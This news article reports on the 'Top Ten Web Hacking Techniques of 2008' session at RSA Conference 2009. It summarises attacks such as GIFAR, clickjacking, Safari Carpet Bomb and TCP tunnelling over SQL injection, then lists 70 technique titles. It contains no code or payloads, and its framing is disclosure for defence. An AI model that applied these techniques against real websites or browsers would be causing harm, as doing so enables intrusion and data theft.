Top Ten Web Hacking Techniques of 2008

Security experts put the latest Web hacking techniques to the test to identify the Top 10 most effective hacking techniques. The results will indicate the state of Web security and the implications for businesses that may be hit by hacks.

By Robert Mullins

Hackers were just as busy as ever in 2008, coming up with ways to thwart the best Web site, browser and application security efforts. The Top Ten hacks — some actual, others theoretical — were acknowledged at RSA® Conference 2009.

“Every year it’s surprising the new types of hacks we discover,” said Jeremiah Grossman, CEO of WhiteHat Security, who hosted the breakout session “Top Ten Web Hacking Techniques of 2008.”

Many of the hacks were discovered by the good guys, security experts who saw a flaw in a browser or application and alerted other good guys in an effort to close that vulnerability, Grossman explained.

Sharing news of these vulnerabilities isn’t meant to give hackers a blueprint for how to be malicious, but to “democratize the playing field,” he said, giving security experts a heads-up to build defenses to possible attacks.

The following hacking techniques were ranked by a panel of four security experts based on their “novelty, impact and pervasiveness,” Grossman explained. The comments from security experts on each hack are from blogs or reports they wrote on the subject:

  1. GIFAR. A contraction of the GIF image file and the Java Archive (JAR) that contains class files for a Java Applet. GIFAR allows a potentially malicious file to be accepted as a valid image by a browser, wrote Nathan McFeters, one of four researchers who discovered GIFAR. “[GIFAR] will allow the execution of arbitrary applet code in the victim’s browser under the context of the web application it was loaded from.”
  2. Breaking Google Gears’ Cross-Origin Communication Model. Google Gears is a browser extension that helps create rich Internet applications (RIAs). The risk is in how Gears “worker” code — JavaScript that can access Gears capabilities such as Local Server, HTTP communication and Database — performs. Researcher Yair Amit discovered that the worker loader disregards the headers of the Gears worker files it loads. “That fact opens an aperture for malicious attacks and significantly broadens the options an attacker has for planting malicious code in a target website,” Amit said.
  3. Safari Carpet Bomb. Security expert Nitesh Dhanjani discovered a vulnerability in Apple’s Safari Web browser that allows a rogue website to litter the user’s desktop, when a Safari is running in Windows, or the download directory in OSX, with unwanted and potentially malicious files. “This can happen because the Safari browser cannot be configured to obtain the user’s permission before it downloads a resource,” Dhanjani explained.
  4. Clickjacking. Cross-site request forgeries (CSRFs) on websites are supposed to be thwarted by onetime tokens, or “nonces,” on a web page that legitimize access. But WhiteHat’s Grossman and colleague Robert Hansen discovered what they called nonce evasion, in which “the browser somehow gains access to data in another domain. Clickjacking, however, evades the need for this cross domain reading,” they wrote. Clickjacking also can thwart click fraud prevention efforts.
  5. A Different Opera. The Opera Web browser is vulnerable to cross-site scripting, noted Stefano Di Paola. A malicious attacker can inject arbitrary browser content through the websites visited with the Opera browser. The code injection is rendered into the Opera History Search page.
  6. Abusing HTML 5 Structured Client-side Storage. HTML code is stored in the client’s browser while the user is visiting a particular site. If a so-called “session storage object” is saved and not deleted when necessary, that object will still be there many hours or even days after it’s no longer needed. “It could cause an unwanted leak of data,” wrote Alberto Trivero, who added that current versions of Firefox, Internet Explorer and Safari don’t adequately deal with unneeded session storage objects. “You can’t easily see or delete it.”
  7. Cross-domain leaks of site logins via Authenticated CSS. This hack thwarts security intended to determine whether an authenticated user is signed into a site or not. “The attack relies on the target site hosting an image at a known URL for authenticated users only,” explained Chris Evans and Michal Zalewski, who discovered the vulnerability. Browsers generally closed that leak for local filesystem URLs but not more widely. “Browsers suck,” Evans added. “We’re building our fortified web apps on foundations of sand.”
  8. Tunneling TCP over HTTP over SQL Injection. Creating a TCP circuit through validly formed HTTP requests can enable tunnelling of data in and out of networks,” explained researchers Glenn Wilkinson, Marco Slaviero and Haroon Meer. If a hacker can upload a Java Server Page, a PHP hypertext protocol or an ASP page on a server, he can connect to hosts behind that server, the trio explained.
  9. ActiveX Repurposing. An ActiveX control automatically upgrades itself if the server informed it of a new software version. By launching a fake upgrade, a hacker “could cause the client to download a possible malicious file,” explained Meer.
  10. Flash Parameter Injection. When an attacker is able to access and control global Flash parameters, he can achieve attacks such as cross-site scripting through Flash, cross-site flashing, and changing the flow of the Flash video, explained three members of IBM Rational’s security team.
All List Hacking Techniques :

  1. CUPS Detection
  2. CSRFing the uTorrent plugin
  3. Clickjacking / Videojacking
  4. Bypassing URL Authentication and Authorization with HTTP Verb Tampering
  5. I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
  6. Safari Carpet Bomb
  7. Flash clipboard Hijack
  8. Flash Internet Explorer security model bug
  9. Frame Injection Fun
  10. Free MacWorld Platinum Pass? Yes in 2008!
  11. Diminutive Worm, 161 byte Web Worm
  12. SNMP XSS Attack (1)
  13. Res Timing File Enumeration Without JavaScript in IE7.0
  14. Stealing Basic Auth with Persistent XSS
  15. Smuggling SMTP through open HTTP proxies
  16. Collecting Lots of Free ‘Micro-Deposits’
  17. Using your browser URL history to estimate gender
  18. Cross-site File Upload Attacks
  19. Same Origin Bypassing Using Image Dimensions
  20. HTTP Proxies Bypass Firewalls
  21. Join a Religion Via CSRF
  22. Cross-domain leaks of site logins via Authenticated CSS
  23. JavaScript Global Namespace Pollution
  24. GIFAR
  25. HTML/CSS Injections – Primitive Malicious Code
  26. Hacking Intranets Through Web Interfaces
  27. Cookie Path Traversal
  28. Racing to downgrade users to cookie-less authentication
  29. MySQL and SQL Column Truncation Vulnerabilities
  30. Building Subversive File Sharing With Client Side Applications
  31. Firefox XML injection into parse of remote XML
  32. Firefox cross-domain information theft (simple text strings, some CSV)
  33. Firefox 2 and WebKit nightly cross-domain image theft
  34. Browser’s Ghost Busters
  35. Exploiting XSS vulnerabilities on cookies
  36. Breaking Google Gears’ Cross-Origin Communication Model
  37. Flash Parameter Injection
  38. Cross Environment Hopping
  39. Exploiting Logged Out XSS Vulnerabilities
  40. Exploiting CSRF Protected XSS
  41. ActiveX Repurposing, (1, 2)
  42. Tunneling tcp over http over sql-injection
  43. Arbitrary TCP over uploaded pages
  44. Local DoS on CUPS to a remote exploit via specially-crafted webpage (1)
  45. JavaScript Code Flow Manipulation
  46. Common localhost dns misconfiguration can lead to “same site” scripting
  47. Pulling system32 out over blind SQL Injection
  48. Dialog Spoofing – Firefox Basic Authentication
  49. Skype cross-zone scripting vulnerability
  50. Safari pwns Internet Explorer
  51. IE “Print Table of Links” Cross-Zone Scripting Vulnerability
  52. A different Opera
  53. Abusing HTML 5 Structured Client-side Storage
  54. SSID Script Injection
  55. DHCP Script Injection
  56. File Download Injection
  57. Navigation Hijacking (Frame/Tab Injection Attacks)
  58. UPnP Hacking via Flash
  59. Total surveillance made easy with VoIP phone
  60. Social Networks Evil Twin Attacks
  61. Recursive File Include DoS
  62. Multi-pass filters bypass
  63. Session Extending
  64. Code Execution via XSS (1)
  65. Redirector’s hell
  66. Persistent SQL Injection
  67. JSON Hijacking with UTF-7
  68. SQL Smuggling
  69. Abusing PHP Sockets (1, 2)
  70. CSRF on Novell GroupWise WebAccess